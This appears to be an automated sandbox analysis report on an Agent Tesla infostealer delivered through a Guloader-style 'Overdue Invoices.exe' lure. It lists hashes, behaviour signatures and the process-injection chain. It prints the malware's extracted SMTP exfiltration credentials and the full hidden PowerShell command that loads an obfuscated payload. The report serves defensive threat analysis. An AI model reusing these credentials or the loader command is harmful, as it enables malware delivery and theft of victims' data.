Analysis
-
max time kernel
294s -
max time network
297s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
07-03-2024 04:54
Static task
static1
Behavioral task
behavioral1
Sample
Overdue Invoices.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral2
Sample
Befingringernes/Souchie/indlsninger/Casement.ps1
Resource
win10v2004-20240226-en
General
-
Target
Overdue Invoices.exe
-
Size
628KB
-
MD5
96ae0e3a6a1553a97db15f694815c87f
-
SHA1
1f64598e9643bfc0fbc851f223e32ddad72c612d
-
SHA256
4490ebc3a2c6260e09ef8f4f71c08a7afc809630e56ec9e8e215a04935bb0394
-
SHA512
f0e2979e615f95d157ca2fd6697ec6650c61f7af2aef4d4d11942796eb87776cbb93c382c031abfb8c691907dc48beaa9282ed0eb32485d1bfb0ef5d03015af9
-
SSDEEP
12288:w38j5o5+HbWsXnE0QlpEMDmF691VC1gqMhtD4dW87cvvss5qZZsN:w3+bWsXZAPq63M1fMhtMDcvvssAsN
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
sqjj uocs bicm tinm - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 69 api.ipify.org 70 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2288 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2500 powershell.exe 2288 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2500 set thread context of 2288 2500 powershell.exe 114 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\Subpreceptoral.tag Overdue Invoices.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 2500 powershell.exe 2500 powershell.exe 2500 powershell.exe 2500 powershell.exe 2500 powershell.exe 2500 powershell.exe 2500 powershell.exe 2500 powershell.exe 2500 powershell.exe 2500 powershell.exe 2288 wab.exe 2288 wab.exe 2288 wab.exe 2288 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2500 powershell.exe Token: SeDebugPrivilege 2288 wab.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 4264 wrote to memory of 2500 4264 Overdue Invoices.exe 100 PID 4264 wrote to memory of 2500 4264 Overdue Invoices.exe 100 PID 4264 wrote to memory of 2500 4264 Overdue Invoices.exe 100 PID 2500 wrote to memory of 2176 2500 powershell.exe 108 PID 2500 wrote to memory of 2176 2500 powershell.exe 108 PID 2500 wrote to memory of 2176 2500 powershell.exe 108 PID 2500 wrote to memory of 2288 2500 powershell.exe 114 PID 2500 wrote to memory of 2288 2500 powershell.exe 114 PID 2500 wrote to memory of 2288 2500 powershell.exe 114 PID 2500 wrote to memory of 2288 2500 powershell.exe 114 PID 2500 wrote to memory of 2288 2500 powershell.exe 114
Processes
-
C:\Users\Admin\AppData\Local\Temp\Overdue Invoices.exe"C:\Users\Admin\AppData\Local\Temp\Overdue Invoices.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -windowstyle hidden "$Undgaaelsers=Get-Content 'C:\Users\Admin\AppData\Local\Butikstidens150\heluldent\retrtens\Befingringernes\Souchie\indlsninger\Casement.Sub';$Inferably=$Undgaaelsers.SubString(55257,3);.$Inferably($Undgaaelsers)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:2176
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3680 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:81⤵PID:1748
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Butikstidens150\heluldent\retrtens\Befingringernes\Souchie\indlsninger\Casement.Sub
Filesize54KB
MD50cd34cacd66cdbb2fc2efb1dfb83660b
SHA19e5099e40637ec5cea43b20290632225bb42d61c
SHA256f41193f6e9bae66ed39755f91bebb1e5183afcd52d3afca61eaeda1ed6e0e153
SHA5122d97c2370d368d66a9c09f2d86b4be2e3a6db7d8d6ead6313bb3b7da87bf465ea24cb8f2575e08b23e467740b6e1f95983229e63937e90419f0e6bd678f3cc02
-
C:\Users\Admin\AppData\Local\Butikstidens150\heluldent\retrtens\Terminis\Unillusive176\unhaggling.Kon
Filesize325KB
MD579813c0a53e8febd326d58f886c4aab4
SHA156bfcda6894a4545618c15198b95c9721c4a21f0
SHA256a5bdd3091a90e23d7bf7350f9aba9720779f2c02913f6e7930f660ea0982b9e5
SHA512f8bc609df038dfd318e0cd1b7fd8d87f483b35c93c52562cb8e7079bef718154d1215075a87409b65999720776a589ac153f36aaf04a8d52bbd7096ab2edaf43
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82